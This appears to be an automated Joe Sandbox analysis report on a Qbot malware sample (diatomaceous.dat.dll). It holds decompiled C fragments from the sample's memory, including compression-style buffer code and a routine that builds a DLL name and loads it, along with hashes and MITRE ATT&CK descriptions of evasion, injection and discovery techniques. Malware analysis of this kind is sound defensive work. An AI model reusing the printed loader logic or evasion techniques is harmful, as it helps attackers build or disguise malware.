							E02BD6020( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x51ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x51ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8508458b
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x51ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x51ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x830a74c0
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xee85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8508458b
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x51ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E02BD6020(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x51ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x5d08408b
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xee85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xee85000
							E02BD7180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E02BD5EE0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xee85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x02bd4166
0x02bd416b
0x02bd416f
0x02bd4172
0x02bd4172
0x02bd4175
0x02bd417a
0x02bd417f
0x02bd4182
0x02bd4187
0x02bd418a
0x02bd4190
0x02bd4190
0x02bd419b
0x02bd419e
0x02bd41a5
0x02bd41aa
0x00000000
0x00000000
0x02bd41b0
0x02bd41b5
0x02bd41b5
0x02bd41ba
0x02bd41c0
0x02bd41ca
0x02bd41cf
0x02bd41d5
0x02bd41f4
0x02bd41f7
0x02bd4202
0x02bd4202
0x02bd4202
0x02bd41f9
0x02bd41f9
0x02bd41fb
0x00000000
0x02bd41fd
0x02bd41fd
0x02bd41fd
0x02bd41fb
0x02bd420a
0x02bd420f
0x02bd4214
0x02bd421a
0x02bd421e
0x02bd4221
0x02bd4224
0x02bd422a
0x02bd422f
0x02bd4232
0x02bd4238
0x02bd423d
0x02bd4243
0x02bd4249
0x02bd424e
0x02bd4251
0x02bd4256
0x02bd425a
0x02bd425e
0x02bd4261
0x02bd4264
0x02bd426d
0x02bd4274
0x02bd4277
0x02bd427a
0x02bd427f
0x02bd4284
0x02bd4287
0x02bd428a
0x02bd428a
0x02bd428e
0x02bd4297
0x02bd429e
0x02bd42a1
0x02bd42a6
0x02bd42ab
0x02bd42ab
0x02bd42ae
0x02bd42b3
0x00000000
0x00000000
0x02bd41d7
0x02bd41d9
0x02bd41e6
0x00000000
0x00000000
0x02bd41e6
0x02bd41d9
0x00000000
0x02bd41d5
0x02bd42b9
0x02bd42be
0x02bd42c1
0x02bd42c4
0x02bd436f
0x02bd436f
0x02bd42ca
0x02bd42ca
0x02bd42ca
0x02bd42cf
0x02bd42f9
0x02bd42fc
0x02bd42fc
0x02bd4301
0x02bd4303
0x02bd4305
0x02bd4308
0x02bd430b
0x02bd4313
0x02bd4318
0x02bd4318
0x02bd431e
0x02bd4321
0x02bd4324
0x02bd4327
0x02bd4329
0x02bd4329
0x02bd432a
0x02bd432a
0x02bd4327
0x02bd4338
0x02bd433b
0x02bd433f
0x02bd4344
0x02bd4347
0x02bd434a
0x02bd434a
0x02bd434a
0x02bd434d
0x02bd434d
0x02bd4350
0x02bd4350
0x02bd42d1
0x02bd42d1
0x02bd42e1
0x02bd42e4
0x02bd42e9
0x02bd42e9
0x02bd42ec
0x02bd42ef
0x02bd42f2
0x02bd42f4
0x02bd42f4
0x02bd4353
0x02bd4355
0x02bd4358
0x02bd4358
0x02bd435e
0x02bd4362
0x02bd4365
0x02bd4367
0x02bd4367
0x02bd4378
0x02bd437a
0x02bd437a
0x02bd4382
0x02bd4390
0x02bd4393
0x02bd4395
0x02bd43b5
0x02bd43b5
0x02bd43b8
0x02bd43be
0x02bd43bf
0x02bd43c2
0x02bd43c4
0x02bd43c7
0x02bd43ca
0x02bd43cd
0x02bd43d1
0x02bd43d4
0x02bd43d7
0x02bd43da
0x02bd43dc
0x02bd43dc
0x02bd43df
0x02bd43e1
0x02bd43e1
0x02bd43e4
0x02bd43e6
0x02bd43e9
0x02bd43f1
0x02bd43f4
0x02bd43f9
0x02bd43f9
0x02bd43ff
0x02bd4402
0x02bd4405
0x02bd4407
0x02bd4407
0x02bd4408
0x02bd4408
0x02bd4413
0x02bd4413
0x02bd4413
0x02bd4416
0x02bd4419
0x02bd4419
0x02bd441c
0x02bd441c
0x02bd43df
0x02bd441f
0x02bd4422
0x02bd4425
0x02bd4427
0x02bd442a
0x02bd442c
0x02bd442f
0x02bd4432
0x02bd4434
0x02bd4437
0x02bd443f
0x02bd4447
0x02bd444a
0x02bd444a
0x02bd444a
0x02bd444d
0x02bd444d
0x02bd444d
0x02bd4450
0x02bd4456
0x02bd4458
0x02bd4458
0x02bd445e
0x02bd4464
0x02bd446d
0x02bd4474
0x02bd4476
0x02bd4479
0x02bd4479
0x02bd447c
0x02bd447c
0x02bd447f
0x02bd4481
0x02bd4484
0x02bd4486
0x02bd44a1
0x02bd44a1
0x02bd44a5
0x02bd44a8
0x02bd44ab
0x02bd44ae
0x02bd44c4
0x02bd44c4
0x02bd44c4
0x02bd44b0
0x02bd44b0
0x02bd44b2
0x02bd44b6
0x02bd44b9
0x00000000
0x02bd44bb
0x02bd44bb
0x02bd44bd
0x00000000
0x02bd44bf
0x02bd44bf
0x02bd44bf
0x02bd44bd
0x02bd44b9
0x02bd44c8
0x02bd44cb
0x02bd44d0
0x02bd44da
0x02bd44da
0x02bd44da
0x02bd44dd
0x02bd4488
0x02bd4488
0x02bd448a
0x02bd4491
0x02bd4491
0x02bd4493
0x02bd4495
0x02bd4497
0x02bd449b
0x02bd449d
0x02bd449f
0x00000000
0x00000000
0x02bd449f
0x02bd449b
0x02bd448c
0x02bd448c
0x02bd448f
0x00000000
0x00000000
0x02bd448f
0x02bd448a
0x02bd44e7
0x02bd44e9
0x02bd44e9
0x02bd44f4
0x02bd4397
0x02bd4397
0x02bd439a
0x00000000
0x02bd439c
0x02bd439c
0x02bd439e
0x02bd43a2
0x00000000
0x02bd43a4
0x02bd43a4
0x02bd43a4
0x02bd43a7
0x00000000
0x02bd43ab
0x02bd43b4
0x02bd43b4
0x02bd43a7
0x02bd43a2
0x02bd439a
0x02bd4386
0x02bd438f
0x02bd438f

APIs

memcpy.MSVCRT ref: 02BD426D
memcpy.MSVCRT ref: 02BD42E4
memcpy.MSVCRT ref: 02BD4313
memcpy.MSVCRT ref: 02BD433F
memcpy.MSVCRT ref: 02BD43F4

Part of subcall function 02BD7180: memcpy.MSVCRT ref: 02BD725E

Part of subcall function 02BD5EE0: memcpy.MSVCRT ref: 02BD5F0A

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
Instruction ID: 19b3570b5b2b32145c372dc7068aec34ffef81741ee622d18ac607e1079dc314
Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
Instruction Fuzzy Hash: B5D103756006009FCB24CF6DD9C4AAAB7F5FF88314B2489ADE88AC7701E731E985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02BCD309 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E02BCD309(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x2bdf8d4; // 0x483fc00
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E02BC9F85(_t50, 0xb9d);
					_t66 =  *0x2bdf8d4; // 0x483fc00
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E02BC9FE4( &_v140, 0x40, L"%08x", E02BCE34A(_t66 + 0xb0, E02BCA5D0(_t66 + 0xb0), 0));
					_t20 =  *0x2bdf8d4; // 0x483fc00
					asm("sbb eax, eax");
					_t25 = E02BC9F85(_t67, ( ~( *(_t20 + 0xa8)) & 0xfffffeb6) + 0xded);
					_t26 =  *0x2bdf8d4; // 0x483fc00
					_t68 = E02BC9C50(_t26 + 0x1020);
					_v12 = _t68;
					E02BC8D9A( &_v8);
					_t32 =  *0x2bdf8d4; // 0x483fc00
					_t34 = E02BC9C50(_t32 + 0x122a);
					 *0x2bdf9d4 = _t34;
					_t35 =  *0x2bdf8d0; // 0x483f8c0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x2bdc9d8,  &_v140, ".", L"dll", 0, 0x2bdc9d8, _t25, 0x2bdc9d8, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x2bdf9d4);
					 *0x2bdf9cc = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E02BCF08E(0x2bdcbc4, _t60);
					}
					 *0x2bdf9d0 = _t38;
					E02BC8DDF( &_v12, 0xfffffffe);
					E02BC8F63( &_v140, 0, 0x80);
					if( *0x2bdf9d0 != 0) {
						goto L10;
					} else {
						E02BC8DDF(0x2bdf9d4, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x2bdf9d0 == 0) {
						_t46 =  *0x2bdf908; // 0x483fa00
						 *0x2bdf9d0 = _t46;
					}
					L10:
					return 1;
				}
			}

0x02bcd309
0x02bcd309
0x02bcd309
0x02bcd30c
0x02bcd318
0x02bcd323
0x02bcd33f
0x02bcd344
0x02bcd34d
0x02bcd34f
0x02bcd357
0x02bcd378
0x02bcd37d
0x02bcd38a
0x02bcd397
0x02bcd3a5
0x02bcd3b6
0x02bcd3bc
0x02bcd3bf
0x02bcd3d6
0x02bcd3e2
0x02bcd3ea
0x02bcd3f1
0x02bcd3f7
0x02bcd403
0x02bcd409
0x02bcd410
0x02bcd423
0x02bcd412
0x02bcd412
0x02bcd415
0x02bcd41b
0x02bcd420
0x02bcd425
0x02bcd430
0x02bcd442
0x02bcd454
0x00000000
0x02bcd456
0x02bcd45d
0x00000000
0x02bcd463
0x02bcd464
0x02bcd464
0x02bcd46b
0x02bcd46d
0x02bcd472
0x02bcd472
0x02bcd477
0x02bcd47b
0x02bcd47b

APIs

LoadLibraryW.KERNEL32 ref: 02BCD403

Strings

%08x, xrefs: 02BCD36A
dll, xrefs: 02BCD3C5

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: %08x$dll
API String ID: 1029625771-2963171978
Opcode ID: 285575d7837389c3d7aa0630c9afe7b062bcf0fd926f8241dbddeb969ce937c4
Instruction ID: 9ad9b7aa462de2842f115fbcd8884772c02358d4d29138bc28e22048d24848f1
Opcode Fuzzy Hash: 285575d7837389c3d7aa0630c9afe7b062bcf0fd926f8241dbddeb969ce937c4
Instruction Fuzzy Hash: F231A372D85204AFE710AB68DC44FFA37ADEB44354F2845AAF20AD3580EB34E9408B61

Uniqueness

Uniqueness Score: -1.00%

Function 02BD36D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E02BD36D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E02BD35EE(_a4);
				 *_t32 = "msxml32.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E02BCA5D0();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x2bdcf90;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x2bdcf90;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L02BD8995();
				return _t29 - _t22;
			}

0x02bd36d5
0x02bd36e0
0x02bd36e7
0x02bd36ee
0x02bd36f4
0x02bd36fc
0x02bd36fd
0x02bd36ff
0x02bd3704
0x02bd370c
0x02bd370c
0x02bd370f
0x02bd3713
0x02bd3706
0x02bd3706
0x02bd370a
0x02bd370c
0x00000000
0x00000000
0x02bd370c
0x02bd370a
0x02bd371c
0x02bd3725
0x02bd372a
0x02bd372d
0x02bd3730
0x02bd3733
0x02bd3735
0x02bd3735
0x02bd373b
0x02bd373e
0x02bd3741
0x02bd3744
0x02bd3749
0x02bd374b
0x02bd374b
0x02bd3751
0x02bd375d
0x02bd375f
0x02bd376b

APIs

lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 02BD371C
_ftol2_sse.MSVCRT ref: 02BD375F

Strings

msxml32.dll, xrefs: 02BD36E7

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _ftol2_sselstrlen
String ID: msxml32.dll
API String ID: 1292649733-2051705522
Opcode ID: 0a6ece314f44bf898151a388015d7159d9c5384c1d7350fc0efb387c311fdaee
Instruction ID: ea177dade132b219c8923d38bd74e74937683e7016719a798eaea611b259bf41
Opcode Fuzzy Hash: 0a6ece314f44bf898151a388015d7159d9c5384c1d7350fc0efb387c311fdaee
Instruction Fuzzy Hash: A911A072A00A49ABCF00AF69E8145DE7FB5FB84350B2645E9D864D6246FB30C1658B81

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report diatomaceous.dat.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Qbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

